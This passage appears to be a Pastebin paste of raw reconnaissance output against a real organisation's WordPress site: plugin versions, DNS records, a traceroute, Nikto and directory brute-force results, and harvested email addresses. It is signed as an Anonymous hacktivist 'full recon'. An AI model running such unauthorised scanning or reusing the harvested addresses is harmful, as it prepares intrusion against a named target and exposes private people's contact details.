  621. | Last updated: 2018-08-09T05:23:00.000Z
  622. | Location: http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/
  623. | Readme: http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/readme.txt
  624. | Changelog: http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/changelog.txt
  625. [!] The version is out of date, the latest version is 3.5.6
  626.  
  627. [+] Name: login-sidebar-widget - v5.7.9
  628. | Latest version: 5.7.9 (up to date)
  629. | Last updated: 2018-07-27T17:19:00.000Z
  630. | Location: http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/
  631. | Readme: http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/readme.txt
  632.  
  633. [+] Name: pta-member-directory - v1.6.9
  634. | Latest version: 1.6.9 (up to date)
  635. | Last updated: 2017-09-18T01:17:00.000Z
  636. | Location: http://www.njoathkeepers.org/wp-content/plugins/pta-member-directory/
  637. | Readme: http://www.njoathkeepers.org/wp-content/plugins/pta-member-directory/readme.txt
  638.  
  639. [+] Name: taskfreak - v1.0.19
  640. | Latest version: 1.0.19 (up to date)
  641. | Last updated: 2016-08-11T06:51:00.000Z
  642. | Location: http://www.njoathkeepers.org/wp-content/plugins/taskfreak/
  643. | Readme: http://www.njoathkeepers.org/wp-content/plugins/taskfreak/readme.txt
  644.  
  645. [+] Finished: Wed Aug 15 07:11:13 2018
  646. [+] Elapsed time: 00:01:32
  647. [+] Requests made: 115
  648. [+] Memory used: 98.434 MB
  649. #######################################################################################################################################
  650. [*] Performing General Enumeration of Domain: njoathkeepers.org
  651. [-] DNSSEC is not configured for njoathkeepers.org
  652. [*] SOA fns1.dnspark.net 66.55.82.13
  653. [*] NS fns1.dnspark.net 66.55.82.13
  654. [*] NS fns1.dnspark.net 2001:1850:1:0:107::d
  655. [*] NS fns2.dnspark.net 192.184.90.32
  656. [*] Bind Version for 192.184.90.32 DNS
  657. [*] NS fns2.dnspark.net 2604:180:1::f02f:2c21
  658. [*] Bind Version for 2604:180:1::f02f:2c21 DNS
  659. [*] MX mail.yourhostingaccount.com 65.254.254.52
  660. [*] MX mail.yourhostingaccount.com 65.254.254.50
  661. [*] MX mail.yourhostingaccount.com 65.254.254.58
  662. [*] MX mail.yourhostingaccount.com 65.254.254.53
  663. [*] MX mail.yourhostingaccount.com 65.254.254.55
  664. [*] MX mail.yourhostingaccount.com 65.254.254.54
  665. [*] MX mail.yourhostingaccount.com 65.254.254.57
  666. [*] MX mail.yourhostingaccount.com 65.254.254.56
  667. [*] MX mail.yourhostingaccount.com 65.254.254.51
  668. [*] A njoathkeepers.org 192.155.88.60
  669. [*] TXT njoathkeepers.org v=spf1 include:servers.mcsv.net ?all
  670. [*] Enumerating SRV Records
  671. [-] No SRV Records Found for njoathkeepers.org
  672. [+] 0 Records Found
  673. #######################################################################################################################################
  674. =======================================================================================================================================
  675. Hosts 12
  676. DNS Records 16
  677. Subdomains 1
  678.  
  679. Hosts (12)
  680. =======================================================================================================================================
  681. 65.254.254.50
  682. 65.254.254.51
  683. 65.254.254.52
  684. 65.254.254.53
  685. 65.254.254.54
  686. 65.254.254.55
  687. 65.254.254.56
  688. 65.254.254.57
  689. 65.254.254.58
  690. 66.55.82.13
  691. 192.155.88.60
  692. 192.184.90.32
  693.  
  694. DNS Records (16)
  695. =======================================================================================================================================
  696. njoathkeepers.org A 192.155.88.60
  697. mail.yourhostingaccount.com MX 65.254.254.50
  698. mail.yourhostingaccount.com MX 65.254.254.51
  699. mail.yourhostingaccount.com MX 65.254.254.52
  700. mail.yourhostingaccount.com MX 65.254.254.53
  701. mail.yourhostingaccount.com MX 65.254.254.54
  702. mail.yourhostingaccount.com MX 65.254.254.55
  703. mail.yourhostingaccount.com MX 65.254.254.56
  704. mail.yourhostingaccount.com MX 65.254.254.57
  705. mail.yourhostingaccount.com MX 65.254.254.58
  706. fns2.dnspark.net NS 192.184.90.32
  707. fns1.dnspark.net NS 2001:1850:1:0:107::d
  708. fns2.dnspark.net NS 2604:180:1::f02f:2c21
  709. fns1.dnspark.net NS 66.55.82.13
  710. fns1.dnspark.net SOA 66.55.82.13
  711. njoathkeepers.org TXT v=spf1 include:servers.mcsv.net ?all
  712.  
  713. Subdomains (1)
  714. =======================================================================================================================================
  715. www.njoathkeepers.org 192.155.88.60
  716.  
  717. Loadbalancing
  718. =======================================================================================================================================
  719. Checking for DNS-Loadbalancing:
  720. NOT FOUND
  721.  
  722. Checking for HTTP-Loadbalancing [Server]:
  723. nginx/1.8.1
  724. NOT FOUND
  725.  
  726. Checking for HTTP-Loadbalancing [Date]:
  727. 11:22:33, 11:22:34, 11:22:35, 11:22:37, 11:22:38, 11:22:39, 11:22:40, 11:22:41, 11:22:43, 11:22:44,
  728. 11:22:45, 11:22:46, 11:22:47, 11:22:48, 11:22:49, 11:22:50, 11:22:51, 11:22:52, 11:22:53, 11:22:54,
  729. 11:22:56, 11:22:57, 11:22:58, 11:22:59, 11:23:00, 11:23:01, 11:23:02, 11:23:02, 11:23:03, 11:23:04,
  730. 11:23:05, 11:23:06, 11:23:06, 11:23:07, 11:23:08, 11:23:09, 11:23:11, 11:23:12, 11:23:13, 11:23:14,
  731. 11:23:15, 11:23:16, 11:23:17, 11:23:18, 11:23:19, 11:23:20, 11:23:21, 11:23:22, 11:23:23, 11:23:24,
  732. NOT FOUND
  733.  
  734. Checking for HTTP-Loadbalancing [Diff]:
  735. NOT FOUND
  736.  
  737. ICMP ECHO
  738. 1 public-gw.vpngate.net (10.211.254.254)
  739. 2 mynetwork (192.168.2.1)
  740. 3 10.11.7.65 (10.11.7.65)
  741. 4 10.178.206.72 (10.178.206.72)
  742. 5 10.178.206.73 (10.178.206.73)
  743. 6 tcore4-toronto12_2-4-0-0_.net.bell.ca (64.230.104.164)
  744. 7 tcore2-torontoxn_ae0.net.bell.ca (64.230.51.156)
  745. 8 bx1-torontoxn_et4-0-0.net.bell.ca (64.230.97.159)
  746. 9 ix-ae-9-0.tcore2.tnk-toronto.as6453.net (63.243.172.25)
  747. 10 if-ae-2-2.tcore1.tnk-toronto.as6453.net (64.86.33.89)
  748. 11 if-ae-25-2.tcore1.ttt-toronto.as6453.net (64.86.33.103)
  749. 12 if-ae-10-2.tcore2.ttt-toronto.as6453.net (64.86.32.34)
  750. 13 if-ae-5-3.tcore1.aeq-ashburn.as6453.net (64.86.85.2)
  751. 14 if-ae-2-2.tcore2.aeq-ashburn.as6453.net (216.6.87.1)
  752. 15 if-ae-12-2.tcore4.njy-newark.as6453.net (216.6.87.201)
  753. 16 66.198.111.166 (66.198.111.166)
  754. 17 173.255.239.21 (173.255.239.21)
  755. 18 mail.nycpatriot.org (192.155.88.60)
  756.  
  757. TCP SYN
  758. 1 mail.nycpatriot.org (192.155.88.60)
  759.  
  760. Zone Transfer
  761. =======================================================================================================================================
  762. Resolving SOA Record
  763. SOA fns1.dnspark.net 66.55.82.13
  764. Resolving NS Records
  765. NS fns2.dnspark.net 192.184.90.32
  766. NS fns2.dnspark.net 2604:180:1::f02f:2c21
  767. NS fns1.dnspark.net 66.55.82.13
  768. NS fns1.dnspark.net 2001:1850:1:0:107::d
  769.  
  770. Trying NS server 192.184.90.32
  771. No answer or RRset not for qname
  772.  
  773. Trying NS server 66.55.82.13
  774.  
  775. Trying NS server 2604:180:1::f02f:2c21
  776.  
  777. Trying NS server 2001:1850:1:0:107::d
  778.  
  779. Whatweb
  780. =======================================================================================================================================
  781. www.njoathkeepers.org [200 OK] Cookies[PHPSESSID]
  782. HTTPServer[nginx/1.8.1]
  783. IP[192.155.88.60]
  784. JQuery[1.12.4]
  785. MetaGenerator[WordPress 4.9.8]
  786. PHP[5.5.38-1~dotdeb+7.1]
  787. Script[text/javascript]
  788. Title[New Jersey Oath Keepers]
  789. UncommonHeaders[link]
  790. WordPress[4.9.8]
  791. X-Powered-By[PHP/5.5.38-1~dotdeb+7.1]
  792. nginx[1.8.1]
  793.  
  794. #######################################################################################################################################
  795. ---------------------------------------------------------------------------------------------------------------------------------------
  796. + Target IP: 192.155.88.60
  797. + Target Hostname: www.njoathkeepers.org
  798. + Target Port: 80
  799. + Start Time: 2018-08-15 07:10:59 (GMT-4)
  800. ---------------------------------------------------------------------------------------------------------------------------------------
  801. + Server: nginx/1.8.1
  802. + Cookie PHPSESSID created without the httponly flag
  803. + Retrieved x-powered-by header: PHP/5.5.38-1~dotdeb+7.1
  804. + The anti-clickjacking X-Frame-Options header is not present.
  805. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  806. + Uncommon header 'link' found, with contents: <http://www.njoathkeepers.org/>; rel=shortlink
  807. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  808. + Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x59247b49 0x1d7
  809. + "robots.txt" contains 13 entries which should be manually viewed.
  810. + OSVDB-10944: /cgi.cgi/: CGI Directory found
  811. + OSVDB-10944: /webcgi/: CGI Directory found
  812. + OSVDB-10944: /cgi-914/: CGI Directory found
  813. + OSVDB-10944: /cgi-915/: CGI Directory found
  814. + OSVDB-10944: /bin/: CGI Directory found
  815. + OSVDB-10944: /cgi/: CGI Directory found
  816. + OSVDB-10944: /mpcgi/: CGI Directory found
  817. + OSVDB-10944: /cgi-bin/: CGI Directory found
  818. + OSVDB-10944: /ows-bin/: CGI Directory found
  819. + OSVDB-10944: /cgi-sys/: CGI Directory found
  820. + OSVDB-10944: /cgi-local/: CGI Directory found
  821. + OSVDB-10944: /htbin/: CGI Directory found
  822. + OSVDB-10944: /cgibin/: CGI Directory found
  823. + OSVDB-10944: /cgis/: CGI Directory found
  824. + OSVDB-10944: /scripts/: CGI Directory found
  825. + OSVDB-10944: /cgi-win/: CGI Directory found
  826. + OSVDB-10944: /fcgi-bin/: CGI Directory found
  827. + OSVDB-10944: /cgi-exe/: CGI Directory found
  828. + OSVDB-10944: /cgi-home/: CGI Directory found
  829. + OSVDB-10944: /cgi-perl/: CGI Directory found
  830. + OSVDB-10944: /scgi-bin/: CGI Directory found
  831. + OSVDB-10944: /cgi-bin-sdb/: CGI Directory found
  832. + OSVDB-10944: /cgi-mod/: CGI Directory found
  833. + /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
  834. + /wp-links-opml.php: This WordPress script reveals the installed version.
  835. + OSVDB-3092: /license.txt: License file found may identify site software.
  836. + /wp-app.log: Wordpress' wp-app.log may leak application/system details.
  837. + /wordpress/: A Wordpress installation was found.
  838. + Cookie wordpress_test_cookie created without the httponly flag
  839. + /wp-login.php: Wordpress login found
  840. + 26160 requests: 0 error(s) and 38 item(s) reported on remote host
  841. + End Time: 2018-08-15 10:50:39 (GMT-4) (13180 seconds)
  842. ---------------------------------------------------------------------------------------------------------------------------------------
  843. #######################################################################################################################################
  844. =======================================================================================================================================
  845. | [*] http://njoathkeepers.org/ redirected to http://www.njoathkeepers.org/
  846. | [*] New target is: http://www.njoathkeepers.org/
  847. =======================================================================================================================================
  848. | Domain: http://www.njoathkeepers.org/
  849. | Server: nginx/1.8.1
  850. | IP: 192.155.88.60=
  851. |
  852. | Directory check:
  853. | [+] CODE: 200 URL: http://www.njoathkeepers.org/Login/
  854. | [+] CODE: 200 URL: http://www.njoathkeepers.org/about/
  855. | [+] CODE: 200 URL: http://www.njoathkeepers.org/ad/
  856. | [+] CODE: 200 URL: http://www.njoathkeepers.org/admin/
  857. | [+] CODE: 200 URL: http://www.njoathkeepers.org/br/
  858. | [+] CODE: 200 URL: http://www.njoathkeepers.org/calendar/
  859. | [+] CODE: 200 URL: http://www.njoathkeepers.org/ca/
  860. | [+] CODE: 200 URL: http://www.njoathkeepers.org/cal/
  861. | [+] CODE: 200 URL: http://www.njoathkeepers.org/dashboard/
  862. | [+] CODE: 200 URL: http://www.njoathkeepers.org/ed/
  863. | [+] CODE: 200 URL: http://www.njoathkeepers.org/embed/
  864. | [+] CODE: 200 URL: http://www.njoathkeepers.org/event/
  865. | [+] CODE: 200 URL: http://www.njoathkeepers.org/feed/
  866. | [+] CODE: 200 URL: http://www.njoathkeepers.org/forgot/
  867. | [+] CODE: 200 URL: http://www.njoathkeepers.org/for/
  868. | [+] CODE: 200 URL: http://www.njoathkeepers.org/fun/
  869. | [+] CODE: 200 URL: http://www.njoathkeepers.org/go/
  870. | [+] CODE: 200 URL: http://www.njoathkeepers.org/ja/
  871. | [+] CODE: 200 URL: http://www.njoathkeepers.org/join/
  872. | [+] CODE: 200 URL: http://www.njoathkeepers.org/login/
  873. | [+] CODE: 200 URL: http://www.njoathkeepers.org/log/
  874. | [+] CODE: 200 URL: http://www.njoathkeepers.org/mail/
  875. | [+] CODE: 200 URL: http://www.njoathkeepers.org/mailing/
  876. | [+] CODE: 200 URL: http://www.njoathkeepers.org/members/
  877. | [+] CODE: 200 URL: http://www.njoathkeepers.org/member/
  878. | [+] CODE: 200 URL: http://www.njoathkeepers.org/memb/
  879. | [+] CODE: 200 URL: http://www.njoathkeepers.org/mem/
  880. | [+] CODE: 200 URL: http://www.njoathkeepers.org/new/
  881. | [+] CODE: 200 URL: http://www.njoathkeepers.org/pe/
  882. | [+] CODE: 200 URL: http://www.njoathkeepers.org/people/
  883. | [+] CODE: 200 URL: http://www.njoathkeepers.org/press/
  884. | [+] CODE: 200 URL: http://www.njoathkeepers.org/rss/
  885. | [+] CODE: 200 URL: http://www.njoathkeepers.org/send/
  886. | [+] CODE: 200 URL: http://www.njoathkeepers.org/som/
  887. | [+] CODE: 200 URL: http://www.njoathkeepers.org/st/
  888. | [+] CODE: 200 URL: http://www.njoathkeepers.org/supp/
  889. | [+] CODE: 200 URL: http://www.njoathkeepers.org/support/
  890. | [+] CODE: 200 URL: http://www.njoathkeepers.org/the/
  891. | [+] CODE: 200 URL: http://www.njoathkeepers.org/wp-admin/
  892. =======================================================================================================================================
  893. |
  894. | File check:
  895. | [+] CODE: 200 URL: http://www.njoathkeepers.org/admin/index.php
  896. | [+] CODE: 200 URL: http://www.njoathkeepers.org/cgi-bin/calendar
  897. | [+] CODE: 200 URL: http://www.njoathkeepers.org/cgi-bin/mail
  898. | [+] CODE: 200 URL: http://www.njoathkeepers.org/favicon.ico
  899. | [+] CODE: 200 URL: http://www.njoathkeepers.org/index.php
  900. | [+] CODE: 200 URL: http://www.njoathkeepers.org/license.txt
  901. | [+] CODE: 200 URL: http://www.njoathkeepers.org/readme.html
  902. | [+] CODE: 200 URL: http://www.njoathkeepers.org/robots.txt
  903. | [+] CODE: 200 URL: http://www.njoathkeepers.org/search/htx/sqlqhit.asp
  904. | [+] CODE: 200 URL: http://www.njoathkeepers.org/search/htx/SQLQHit.asp
  905. | [+] CODE: 200 URL: http://www.njoathkeepers.org/search/sqlqhit.asp
  906. | [+] CODE: 200 URL: http://www.njoathkeepers.org/search/SQLQHit.asp
  907. | [+] CODE: 200 URL: http://www.njoathkeepers.org/vgn/login
  908. | [+] CODE: 200 URL: http://www.njoathkeepers.org/wp-content/plugins/akismet/readme.txt
  909. =======================================================================================================================================
  910. |
  911. | Check robots.txt:
  912. | [+] User-agent: *
  913. | [+] Disallow: /calendar/action~posterboard/
  914. | [+] Disallow: /calendar/action~agenda/
  915. | [+] Disallow: /calendar/action~oneday/
  916. | [+] Disallow: /calendar/action~month/
  917. | [+] Disallow: /calendar/action~week/
  918. | [+] Disallow: /calendar/action~stream/
  919. | [+] Disallow: /calendar/action~undefined/
  920. | [+] Disallow: /calendar/action~http:/
  921. | [+] Disallow: /calendar/action~default/
  922. | [+] Disallow: /calendar/action~poster/
  923. | [+] Disallow: /calendar/action~*/
  924. | [+] Disallow: /*controller=ai1ec_exporter_controller*
  925. | [+] Disallow: /*/action~*/
  926. #######################################################################################################################################
  927. | External hosts:
  928. | [+] External Host Found: https://secure.php.net
  929. | [+] External Host Found: http://irc.nycpatriot.org
  930. | [+] External Host Found: https://www.mysql.com
  931. | [+] External Host Found: http://www.actforamerica.org
  932. | [+] External Host Found: http://www.kidsguidenj.com
  933. | [+] External Host Found: http://www.daveyspub.com
  934. | [+] External Host Found: http://gotenna.com
  935. | [+] External Host Found: https://www.google.com
  936. | [+] External Host Found: http://maps.googleapis.com
  937. | [+] External Host Found: http://www.youtube.com
  938. | [+] External Host Found: http://www.philly.com
  939. | [+] External Host Found: http://www.meetup.com
  940. | [+] External Host Found: http://www.somersetcounty4h.org
  941. | [+] External Host Found: https://twitter.com
  942. | [+] External Host Found: http://oathkeepers.org
  943. | [+] External Host Found: http://eepurl.com
  944. | [+] External Host Found: https://www.facebook.com
  945. | [+] External Host Found: http://njfirearms.com
  946. | [+] External Host Found: https://wordpress.org
  947. | [+] External Host Found: https://www.change.org
  948. | [+] External Host Found: http://gmpg.org
  949. | [+] External Host Found: https://planet.wordpress.org
  950. | [+] External Host Found: https://codex.wordpress.org
  951. | [+] External Host Found: https://developer.wordpress.org
  952. | [+] External Host Found: https://httpd.apache.org
  953. | [+] External Host Found: https://www.paypal.com
  954. |
  955. | FCKeditor File Upload:
  956. |
  957. | File Upload Forms:
  958. |
  959. | E-mails:
  960. | [+] E-mail Found: stepman@njoathkeepers.org
  961. | [+] E-mail Found: secretary@njoathkeepers.org
  962. | [+] E-mail Found: forum@njoathkeepers.org
  963. | [+] E-mail Found: gloucester@njoathkeepers.org
  964. | [+] E-mail Found: dwhite@actforamerica.org
  965. | [+] E-mail Found: m@tidakada.com
  966. | [+] E-mail Found: josephhakim@internationchristianunion.org
  967. | [+] E-mail Found: kids@kidsguidenj.com
  968. | [+] E-mail Found: pio@njoathkeepers.org
  969. | [+] E-mail Found: cpt@njoathkeepers.org
  970. | [+] E-mail Found: communications@njoathkeepers.org
  971. | [+] E-mail Found: ohn@newyorkoathkeeper.com
  972. | [+] E-mail Found: donations@americanbedrockfoundation.org
  973. | [+] E-mail Found: regional-north@njoathkeepers.org
  974. ######################################################################################################################################
  975. | http://www.njoathkeepers.org/wp-content/plugins/awesome-surveys/js/script.min.js?ver=2.1
  976. | http://www.njoathkeepers.org/wp-content/uploads/2013/12/wbai-20131230.mp3
  977. | http://www.njoathkeepers.org/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3
  978. | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/js/moment.min.js?ver=1
  979. | http://www.njoathkeepers.org/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=4.9.8
  980. | http://www.njoathkeepers.org/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.6-78496d1
  981. | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/css/fullcalendar.min.css?ver=3.7.3
  982. | http://www.njoathkeepers.org/wp-content/plugins/pta-member-directory/includes/css/pta-contact-form.css?ver=4.9.8
  983. | http://www.njoathkeepers.org/wp-includes/css/dashicons.min.css?ver=4.9.8
  984. | http://www.njoathkeepers.org/wp-includes/css/buttons.min.css?ver=4.9.8
  985. | http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/css/style_login_widget.css?ver=4.9.8
  986. | http://www.njoathkeepers.org//www.njoathkeepers.org/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/vortex/css/ai1ec_parsed_css.css?ver=2.5.32
  987. | http://www.njoathkeepers.org/wp-admin/css/install.min.css?ver=4.9.8
  988. | http://www.njoathkeepers.org/wp-content/plugins/awesome-surveys/js/jquery.validate.min.js?ver=1.13.1
  989. | http://www.njoathkeepers.org/wp-content/plugins/tablepress/js/jquery.datatables.min.js?ver=1.9
  990. | http://www.njoathkeepers.org/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.6-78496d1
  991. | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/js/qtip2.js?ver=3.7.3
  992. | http://www.njoathkeepers.org/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=4.9.8
  993. | http://www.njoathkeepers.org/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4
  994. | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/js/event-manager.min.js?ver=3.7.3
  995. | http://www.njoathkeepers.org/wp-includes/js/wp-embed.min.js?ver=4.9.8
  996. | http://www.njoathkeepers.org/wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4
  997. | http://www.njoathkeepers.org/wp-content/uploads/2013/12/wbai-20131230.mp3?_=1
  998. | http://www.njoathkeepers.org/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=4.9.8
  999. | http://www.njoathkeepers.org/wp-includes/js/jquery/jquery.js?ver=1.12.4
  1000. | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/js/fullcalendar.min.js?ver=3.7.3
  1001. | http://www.njoathkeepers.org/wp-content/plugins/awesome-surveys/css/normalize.min.css?ver=4.9.8
  1002. | http://www.njoathkeepers.org/wp-admin/css/ie.min.css?ver=4.9.8
  1003. | http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/widget/es-widget.css?ver=4.9.8
  1004. | http://www.njoathkeepers.org/wp-content/plugins/taskfreak/js/front.js?ver=4.9.8
  1005. | http://www.njoathkeepers.org/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4
  1006. | http://www.njoathkeepers.org/wp-content/plugins/shortcodes-ultimate/assets/css/media-shortcodes.css?ver=5.0.4
  1007. | http://www.njoathkeepers.org/wp-content/tablepress-combined.min.css?ver=38
  1008. | http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/js/jquery.validate.min.js?ver=4.9.8
  1009. | http://www.njoathkeepers.org/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3
  1010. | http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/js/additional-methods.js?ver=4.9.8
  1011. | http://www.njoathkeepers.org/wp-admin/css/install.css?ver=20100228
  1012. | http://www.njoathkeepers.org/wp-content/plugins/all-in-one-event-calendar/public/js_cache/calendar.js?ver=2.5.32
  1013. | http://www.njoathkeepers.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
  1014. | http://www.njoathkeepers.org/wp-content/plugins/awesome-surveys/css/forms.min.css?ver=4.9.8
  1015. | http://www.njoathkeepers.org/wp-content/plugins/awesome-surveys/css/style.min.css?ver=2.1
  1016. | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/js/frontend.min.js?ver=3.7.3
  1017. | http://www.njoathkeepers.org/wp-content/plugins/taskfreak/css/front.css?ver=4.9.8
  1018. | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/js/maps/googlemaps-adapter.js?ver=3.7.3
  1019. | http://www.njoathkeepers.org/wp-content/themes/njoathkeepers/style.css?ver=4.9.8
  1020. | http://www.njoathkeepers.org/wp-includes/js/jquery/ui/button.min.js?ver=1.11.4
  1021. | http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/widget/es-widget-page.js?ver=4.9.8
  1022. | http://www.njoathkeepers.org/wp-includes/wlwmanifest.xml
  1023. | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/css/eventorganiser-front-end.min.css?ver=3.7.3
  1024. | http://www.njoathkeepers.org//ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/themes/smoothness/jquery-ui.css?ver=4.9.8
  1025. =======================================================================================================================================
  1026. #######################################################################################################################################
  1027. Anonymous JTSEC #OpDomesticTerrorism Full Recon #9
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!